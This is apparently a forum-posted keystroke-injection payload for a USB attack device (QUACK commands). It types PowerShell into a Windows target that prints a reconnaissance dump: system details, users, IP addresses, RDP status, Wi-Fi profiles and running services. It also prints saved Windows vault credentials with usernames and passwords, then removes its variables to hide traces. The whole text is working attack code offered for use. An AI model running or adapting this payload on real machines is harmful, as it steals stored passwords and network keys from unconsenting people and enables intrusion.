QUACK ENTER
QUACK STRING "\"\""
QUACK ENTER
QUACK STRING "\"\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"\""
QUACK ENTER
QUACK STRING "\"OS:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$computerOs | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK ENTER
QUACK STRING "\"CPU:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$computerCpu | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"RAM:\""
QUACK ENTER
QUACK STRING "\"==================================================================\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Capacity: \" + \$computerRamCapacity+ (\$computerRam | out-string)"
QUACK ENTER
QUACK STRING "\"Mainboard:\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"==================================================================\"+ (\$computerMainboard | out-string)"
QUACK ENTER
QUACK STRING "\"Bios:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (Get-WmiObject win32_bios | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Local-user:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$luser | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"HDDs:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$Hdds | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"COM & SERIAL DEVICES:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$COMDevices | Out-String)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Network:\""
QUACK ENTER
QUACK STRING "\"==================================================================\""
QUACK ENTER
QUACK STRING "\"Computers MAC address: \" + \$computerMAC"
QUACK ENTER
QUACK STRING "\"Computers IP address: \" + \$computerIP.ipaddress[0]"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Public IP address: \" + \$computerPubIP"
QUACK ENTER
QUACK DELAY 2000  
QUACK STRING "\"RDP: \" + \$RDP"
QUACK ENTER
QUACK STRING "\"\""
QUACK ENTER
QUACK STRING "(\$Network | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"W-Lan profiles:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$WLANProfileObjects | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"listeners / ActiveTcpConnections:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$listener | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Current running process:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$process | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Services:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$service | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Installed software:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$software | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Installed drivers:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$drivers | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Installed videocards:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$videocard | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Windows/user passwords:\""
QUACK ENTER
QUACK STRING "\"==================================================================\""
QUACK ENTER
QUACK STRING "\$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "Remove-Variable -Name computerPubIP,"
QUACK ENTER
QUACK STRING "computerIP,IsDHCPEnabled,Network,Networks,"
QUACK ENTER 
QUACK STRING "computerMAC,computerSystem,computerBIOS,computerOs,"
QUACK ENTER
QUACK STRING "computerCpu, computerMainboard,computerRamCapacity,"
QUACK ENTER
QUACK STRING "computerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName,"
QUACK ENTER
QUACK STRING "Output,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser,"
QUACK ENTER
QUACK STRING "process,listener,listenerItem,process,service,software,drivers,videocard,"
QUACK ENTER
QUACK STRING "vault -ErrorAction SilentlyContinue -Force"
QUACK ENTER
# Left disabled: switching back to ATTACKMODE HID would withdraw the udisk from the target.
#ATTACKMODE HID
QUACK DELAY 5000

 

Edited by spywill
